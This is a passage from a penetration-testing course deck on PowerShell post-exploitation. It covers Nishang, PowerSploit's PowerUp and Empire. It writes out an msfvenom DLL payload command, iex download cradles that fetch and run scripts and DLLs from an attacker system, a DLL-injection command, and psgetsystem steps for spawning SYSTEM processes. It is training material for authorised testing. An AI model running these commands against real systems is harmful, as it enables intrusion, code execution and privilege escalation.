Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Different types continued:

Invoke-PowerShellTcpOneLineBind.ps1:
[Link]
Invoke-PowerShellUdp.ps1: [Link]
PowerShellUdp.ps1
Invoke-PowerShellUdpOneLine.ps1: [Link]
PowerShellUdpOneLine.ps1
Invoke-PowerShellWmi.ps1: [Link]
PowerShellWmi.ps1
Invoke-PsGcat.ps1: [Link]
Invoke-PsGcatAgent.ps1: [Link]
PsGcatAgent.ps1
Remove-PoshRat.ps1: [Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


In addition to the “Gather” and other modules we’ve covered, we can find a script for
mostly any phase of our post-exploitation within the Nishang Framework with utilities in
the following categories.

ActiveDirectory: [Link]
Antak-WebShell: [Link]
Backdoors: [Link]
Bypass: [Link]
Client: [Link]
Escalation: [Link]
Execution: [Link]
Gather: [Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


MITM: [Link]
Misc: [Link]
Pivot: [Link]
Prasadhak: [Link]
Scan: [Link]
Shells: [Link]
Utility: [Link]

Explore all of the different options we have with this framework and how it
relates to our post-exploitation process.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Seeing as we’ve previously covered several tools within the
PowerSploit framework for the purpose of information gathering
(the Invoke-PortScan and Get-HttpStatus tools specifically), we
should also cover some of the tools it provides in regards to post-
exploitation as well.

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


As with other frameworks, there are several categories in
PowerSploit we can use for our post-exploitation purposes.

• AntivirusBypass • Persistence
• Code Execution • Privesc
• Exfiltration • Recon
• Mayhem • ScriptModification

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


One which we should cover here, and offers a good starting point
in the identification of misconfigurations which could lead to
privilege escalation, is the “PowerUp” module within the “Privesc”
category.

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We can first import the Privesc.psm1 module from within the
Privesc modules directory and have a look at some of the options
we have:
PS C:\Modules\PowerSploit\Privesc> Import-Module .\Privesc.psm1

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


PS C:\> Get-Command –Module Privesc

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We can see the PowerUp module has plenty of options for us to
explore.

Of course, we can run any one of those functions or scripts


independently, but this module includes an “Invoke-AllChecks”
function.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Invoke-AllChecks will run all functions related to the Privesc
module looking for misconfigurations, permissions issues with
services, opportunities for DLL hijacking a number of other useful
checks.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


PS C:\Modules\PowerSploit\Privesc> Invoke-AllChecks

We can invoke it
on the target after
we’ve imported
the Privesc.psm1
module with the
“Invoke-
AllChecks”
command.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The output will also
indicate an
“AbuseFuntion” we
can use to further
exploit the target.

In the case with the


following example,
PowerUp identified a
potential service
binary we can install
with the “Install-
ServiceBinary –Name
‘ClickToRunSvc’
command.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


PowerUp also gives us the option to save all results to an HTML file
with the -HTMLReport flag and will generate an HTML file we can
use to investigate any paths to privilege escalation.

The file will be saved in the current directory Invoke-AllChecks was


run from and will be in “[Link]” naming
format.
PS C:\> Invoke-AllChecks -HTMLReport

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


-HTMLReport Output

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The “CodeInjection” category in PowerSploit gives us some options
in regards to several methods we can inject our own code into
existing processes on the target system, whether it be via DLL
injection, injecting our own custom Shellcode into an existing
process, or using WMI to execute commands on the target.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The one we’d like to cover is the “Invoke-DLLInjection” script as it’s
the most commonly used.

This function injects an attacker-defined DLL into any existing


process ID on the target system.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The first requirement, of course, is that we generate a DLL for
demonstration purposes.

This can be done in a number of ways, but most commonly, we can


just use Metasploit’s msfvenom to generate one with the following
command:
msfvenom -p windows/exec CMD=“[Link]” -f dll > [Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The example on the previous slide will simply execute a [Link]
prompt on the target when injected.

In your exploration of the tool, you can create a dll that will spawn
a meterpreter reverse shell for instance.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The DLL will need to be downloaded to the target. This can be
done in any number of ways we’ve covered in this module.

We can use the [Link] “DownloadFile” download cradle


method for that.
PS C:\> iex (New-Object
[Link]).DownloadFile(‘[Link]
‘C:\programdata\[Link]’)

In the above, we’re downloading our [Link] file into the


“C:\Programdata\” folder on the target.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We should next identify a process on the
target system we’d like to inject our DLL
into. We can simply run the “ps” command PS C:\> ps | ? {$_.ProcessName -match “notepad"}
from the powershell console.

In this example, we’ll run the “ps”


command with a where-object statement to
look for a process that matches “notepad,”
and we’ll inject our DLL into that process
(reference figure to the right).

In this case, we’ve identified three


processes matching the “notepad” string,
and we’ll choose the one with Pid “7420”
for our DLL Injection.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Once we’ve downloaded our DLL to the target, and identified the
process we’re going to inject into, in this example, we’ve chosen
the [Link] process ID 7420, we can use another download
cradle (this time “DownloadString” method) to download and
execute the “Invoke-DLLInjection.ps1” script from our attacker
system, along with the correct arguments for injecting our DLL into
that existing process.
PS C:\> iex (New-Object
[Link]).DownloadString(‘[Link]
DLLInjection.ps1); Invoke-DLLInjection –ProcessID 7420
C:\programdata\[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Once that is complete, if we run the “ps” command again, we can
confirm that we now have a “cmd” process which has been
spawned from our DLL Injection operation, which is created in a
new process thread.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


A great explanation of the basics of how DLL injection works can be
found here:
[Link]
[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


PowerShell &
Metasploit

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Another excellent PowerShell tool we’d like to mention by
decoder-it is “psgetsystem” and can be downloaded here:

[Link]

[Link]
[Link]
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Psgetsystem allows us to get SYSTEM privileges via a parent
process, which then spawns a child process which effectively
inherits the SYSTEM access privileges of the parent.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Although this tool needs to be run as Administrator, it’s a great way
to evade application whitelisting solutions by being able to inject
ourselves into an already signed or other trusted process.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Let’s see it in action.

Once we’ve downloaded the psgetsys.ps1 script to our target, we


can source it and execute its class function with the following
commands:
PS C:\> . .\psgetsys.ps1
PS C:\> [MyProcess]::CreateProcessFromParent(<system_pid>,”<command_to_execute>”)

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


But before we do that, we need to identify some SYSTEM
processes and choose one we can “piggyback” onto.

We can use the following command to find those:


PS C:\> Get-Process -IncludeUserName | Where-Object {$_.UserName -match
"SYSTEM"} |Format-List –Property Username,Name,Id

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


That should return a
list of all SYSTEM-
owned processes
along with their
PIDs and process
names.

We’ll use the


“ZeroConfigService”
for our example:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Now that we have a PID for a SYSTEM-owned process (3632 in this case), we can
continue with our execution of psgetsystem.

For demonstration purposes, we’ll instruct psgetsystem to run “[Link]” within the
ZeroConfigService process 3632.

This will launch a [Link] prompt, but as a child process of the SYSTEM-owned
[Link] process, and as a result, our “child” process, will also be
SYSTEM.
PS C:\> . .\psgetsys.ps1
PS C:\> [MyProcess]::CreateProcessFromParent(3632,”[Link]”)

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We can confirm this by running a tool like Process Explorer, to see
that our [Link] process has been spawned as a child process of
the ZeroConfigService process, and is also SYSTEM.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


In an attack scenario, we could easily launch a meterpreter
executable payload as SYSTEM, and get a SYSTEM shell from the
target machine.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Empire is another great post-exploitation framework which we’ll
briefly describe here but will cover in greater detail in a video
accompanying this module.

[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Its main advantage is that it implements powershell functionality
without requiring the existence of powershell on a target machine.

It is in a world of its own in regards to other frameworks in that it


utilizes its own built-in listeners, agents and modules to
compromise and conduct all facets of post-exploitation from
information gathering to privilege escalation, lateral movement,
persistence and also integrates with the Metasploit Framework.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


You can learn more about Empire here:

[Link]

Make sure to check out the video included with this module for a
walkthrough of its capabilities.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Introduction to
Empire Overview Leveraging WMI and
Methods for Persistence

PowerShell and
Metasploit

UAC Bypass PowerShell


Exploit Script
Walkthrough

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


This concludes the PowerShell for Pentesters module.

As with all other technologies we encounter throughout our experiences with


Penetration Testing and Information Security in-general, it’s important that we
allow ourselves to dig deeper in our quest to understand the multitude of
methods, techniques, and tools that we encounter throughout our journey.
Many great resources can aid us in our paths to “security enlightenment,” and
we should explore all possible paths in an attempt to understand this amazing,
creative and everchanging field better.

Explore all paths, and enjoy the process! We hope you’ve enjoyed this lesson.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


PowerShell for PowerShell for
Pentesters – Part 1 Pentesters – Part 2

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Penetration Testing Professional 5.0 – Caendra Inc. © 2018
[Link] DownloadFile
[Link] Method
[Link] [Link]
us/library/[Link](v=vs.110).aspx us/library/ez801hhe(v=vs.110).aspx

New-Object [Link]
[Link] [Link]
us/powershell/module/[Link]/ne us/library/[Link](v=vs.110).aspx
w-object?view=powershell-6

Invoke-Expression COM Objects


[Link] [Link]
us/powershell/module/[Link]/in us/library/windows/desktop/ms690343(v=vs.85).aspx
voke-expression?view=powershell-6

[Link] [Link]
DownloadString Method [Link]
us/library/[Link](v=vs.110).aspx
[Link]
us/library/fhd1f0sw(v=vs.110).aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


DLL Injection Basics Empire
[Link] [Link]
[Link] start

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Invoke-CradleCrafter Get-HttpStatus
[Link] [Link]
CradleCrafter Get-HttpStatus/

Invoke-Obfuscation Posh-SecMod
[Link] [Link]
Obfuscation

PowerSploit Nishang
[Link] [Link]

psgetsystem
Invoke-Portscan [Link]
[Link]
b/master/Recon/Invoke-Portscan.ps1

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Empire
[Link]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

You might also like